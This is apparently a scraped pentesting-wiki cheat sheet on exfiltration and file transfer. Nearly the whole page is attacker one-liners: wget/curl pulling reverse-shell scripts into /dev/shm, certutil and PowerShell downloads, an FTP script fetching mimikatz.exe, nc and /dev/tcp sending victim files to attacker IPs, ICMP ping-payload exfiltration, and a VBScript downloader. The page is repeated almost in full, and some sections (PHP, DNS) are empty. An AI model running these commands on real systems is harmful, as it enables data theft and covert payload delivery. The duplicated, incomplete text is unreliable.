Exfiltration

PreviousPhishing Methodology NextTunneling and Port Forwarding

Last updated 3 years ago

Was this helpful?

Exfiltration

Copy&Paste Base64

Linux

base64 -w0 <file> base64 -d file

Windows

certutil -encode payload.dll payload.b64certutil -decode payload.b64 payload.dll

HTTP

Linux

wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.pywget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shmcurl 10.10.14.14:8000/shell.py -o /dev/shm/shell.pyfetch 10.10.14.14:8000/shell.py

Windows

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"Import-Module BitsTransferStart-BitsTransfer -Source $url -Destination $outputStart-BitsTransfer -Source $url -Destination $output -Asynchronous

Upload files

HTTPS Server

import BaseHTTPServer, SimpleHTTPServerimport sslhttpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)httpd.serve_forever()

FTP

FTP server (python)

pip3 install pyftpdlibpython3 -m pyftpdlib -p 21

FTP server (NodeJS)

sudo npm install -g ftp-srv --saveftp-srv ftp://0.0.0.0:9876 --root /tmp

FTP server (pure-ftp)

apt-get update && apt-get install pure-ftp

groupadd ftpgroupuseradd -g ftpgroup -d /dev/null -s /etc ftpuserpure-pwd useradd fusr -u ftpuser -d /ftphomepure-pw mkdbcd /etc/pure-ftpd/auth/ln -s ../conf/PureDB 60pdbmkdir -p /ftphomechown -R ftpuser:ftpgroup /ftphome//etc/init.d/pure-ftpd restart

Windows client

echo open 10.11.0.41 21 > ftp.txtecho USER anonymous >> ftp.txtecho anonymous >> ftp.txtecho bin >> ftp.txtecho GET mimikatz.exe >> ftp.txtecho bye >> ftp.txtftp -n -v -s:ftp.txt

SMB

Kali as server

kali_op1> impacket-smbserver -smb2support kali `pwd` kali_op2> smbserver.py -smb2support name /path/folder impacket-smbserver -smb2support -user test -password test test `pwd`

Or create a smb share using samba:

apt-get install sambamkdir /tmp/smbchmod 777 /tmp/smb[public]    comment = Samba on Ubuntu    path = /tmp/smb    read only = no    browsable = yes    guest ok = Yesservice smbd restart

Windows

CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind> net use z: \\10.10.14.14\test /user:test test WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"WindPS-2> cd new_disk:

SCP

The attacker has to have SSHd running.

scp <username>@<Attacker_IP>:<directory>/<filename>

NC

nc -lvnp 4444 > new_filenc -vn <IP> 4444 < exfil_file

/dev/tcp

Download file from victim

nc -lvnp 80 > file cat /path/file > /dev/tcp/10.10.10.10/80

Upload file to victim

nc -w5 -lvnp 80 < file_to_send.txt exec 6< /dev/tcp/10.10.10.10/4444cat <&6 > file.txt

thanks to @BinaryShadow_

ICMP

xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done

from scapy.all import *def process_packet(pkt):    if pkt.haslayer(ICMP):        if pkt[ICMP].type == 0:            data = pkt[ICMP].load[-4:]             print(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)

SMTP

If you can send data to an SMTP server, you can create a SMTP to receive the data with python:

sudo python -m smtpd -n -c DebuggingServer :25

TFTP

By default in XP and 2003 (in others it need to be explicitly added during installation)

In Kali, start TFTP server:

mkdir /tftpatftpd --daemon --port 69 /tftpcp /path/tp/nc.exe /tftp

TFTP server in python:

pip install ptftpdptftpd -p 69 tap0 .

In victim, connect to the Kali server:

tftp -i <KALI-IP> get nc.exe

PHP

Download a file with a PHP oneliner:

VBScript

Attacker> python -m SimpleHTTPServer 80

Victim

echo strUrl = WScript.Arguments.Item(0) > wget.vbsecho StrFile = WScript.Arguments.Item(1) >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbsecho Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbsecho Err.Clear >> wget.vbsecho Set http = Nothing >> wget.vbsecho Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbsecho If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbsecho If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbsecho If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbsecho http.Open "GET", strURL, False >> wget.vbsecho http.Send >> wget.vbsecho varByteArray = http.ResponseBody >> wget.vbsecho Set http = Nothing >> wget.vbsecho Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbsecho Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbsecho strData = "" >> wget.vbsecho strBuffer = "" >> wget.vbsecho For lngCounter = 0 to UBound(varByteArray) >> wget.vbsecho ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbsecho Next >> wget.vbsecho ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.5/evil.exe evil.exe

Debug.exe

This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the debug.exe program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like netcat. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with debug.exe.

Debug.exe can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that:

Now it only weights 29 kb. Perfect. So now let's disassemble it:

wine exe2bat.exe nc.exe nc.txt

Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe

DNS

PreviousPhishing Methodology NextTunneling and Port Forwarding

Last updated 3 years ago

Was this helpful?

Copy&Paste Base64

Linux

base64 -w0 <file> base64 -d file

Windows

certutil -encode payload.dll payload.b64certutil -decode payload.b64 payload.dll

HTTP

Linux

wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.pywget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shmcurl 10.10.14.14:8000/shell.py -o /dev/shm/shell.pyfetch 10.10.14.14:8000/shell.py

Windows

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"Import-Module BitsTransferStart-BitsTransfer -Source $url -Destination $outputStart-BitsTransfer -Source $url -Destination $output -Asynchronous

Upload files

HTTPS Server

import BaseHTTPServer, SimpleHTTPServerimport sslhttpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)httpd.serve_forever()

FTP

FTP server (python)

pip3 install pyftpdlibpython3 -m pyftpdlib -p 21

FTP server (NodeJS)

sudo npm install -g ftp-srv --saveftp-srv ftp://0.0.0.0:9876 --root /tmp

FTP server (pure-ftp)

apt-get update && apt-get install pure-ftp

groupadd ftpgroupuseradd -g ftpgroup -d /dev/null -s /etc ftpuserpure-pwd useradd fusr -u ftpuser -d /ftphomepure-pw mkdbcd /etc/pure-ftpd/auth/ln -s ../conf/PureDB 60pdbmkdir -p /ftphomechown -R ftpuser:ftpgroup /ftphome//etc/init.d/pure-ftpd restart

Windows client

echo open 10.11.0.41 21 > ftp.txtecho USER anonymous >> ftp.txtecho anonymous >> ftp.txtecho bin >> ftp.txtecho GET mimikatz.exe >> ftp.txtecho bye >> ftp.txtftp -n -v -s:ftp.txt

SMB

Kali as server

kali_op1> impacket-smbserver -smb2support kali `pwd` kali_op2> smbserver.py -smb2support name /path/folder impacket-smbserver -smb2support -user test -password test test `pwd`

Or create a smb share using samba:

apt-get install sambamkdir /tmp/smbchmod 777 /tmp/smb[public]    comment = Samba on Ubuntu    path = /tmp/smb    read only = no    browsable = yes    guest ok = Yesservice smbd restart

Windows

CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind> net use z: \\10.10.14.14\test /user:test test WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"WindPS-2> cd new_disk:

SCP

The attacker has to have SSHd running.

scp <username>@<Attacker_IP>:<directory>/<filename>

NC

nc -lvnp 4444 > new_filenc -vn <IP> 4444 < exfil_file

/dev/tcp

Download file from victim

nc -lvnp 80 > file cat /path/file > /dev/tcp/10.10.10.10/80

Upload file to victim

nc -w5 -lvnp 80 < file_to_send.txt exec 6< /dev/tcp/10.10.10.10/4444cat <&6 > file.txt

thanks to @BinaryShadow_

ICMP

xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done

from scapy.all import *def process_packet(pkt):    if pkt.haslayer(ICMP):        if pkt[ICMP].type == 0:            data = pkt[ICMP].load[-4:]             print(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)

SMTP

If you can send data to an SMTP server, you can create a SMTP to receive the data with python:

sudo python -m smtpd -n -c DebuggingServer :25

TFTP

By default in XP and 2003 (in others it need to be explicitly added during installation)

In Kali, start TFTP server:

mkdir /tftpatftpd --daemon --port 69 /tftpcp /path/tp/nc.exe /tftp

TFTP server in python:

pip install ptftpdptftpd -p 69 tap0 .

In victim, connect to the Kali server:

tftp -i <KALI-IP> get nc.exe

PHP

Download a file with a PHP oneliner:

VBScript

Attacker> python -m SimpleHTTPServer 80

Victim

echo strUrl = WScript.Arguments.Item(0) > wget.vbsecho StrFile = WScript.Arguments.Item(1) >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbsecho Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbsecho Err.Clear >> wget.vbsecho Set http = Nothing >> wget.vbsecho Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbsecho If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbsecho If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbsecho If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbsecho http.Open "GET", strURL, False >> wget.vbsecho http.Send >> wget.vbsecho varByteArray = http.ResponseBody >> wget.vbsecho Set http = Nothing >> wget.vbsecho Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbsecho Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbsecho strData = "" >> wget.vbsecho strBuffer = "" >> wget.vbsecho For lngCounter = 0 to UBound(varByteArray) >> wget.vbsecho ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbsecho Next >> wget.vbsecho ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.5/evil.exe evil.exe

Debug.exe

Debug.exe can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that:

Now it only weights 29 kb. Perfect. So now let's disassemble it:

wine exe2bat.exe nc.exe nc.txt

Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe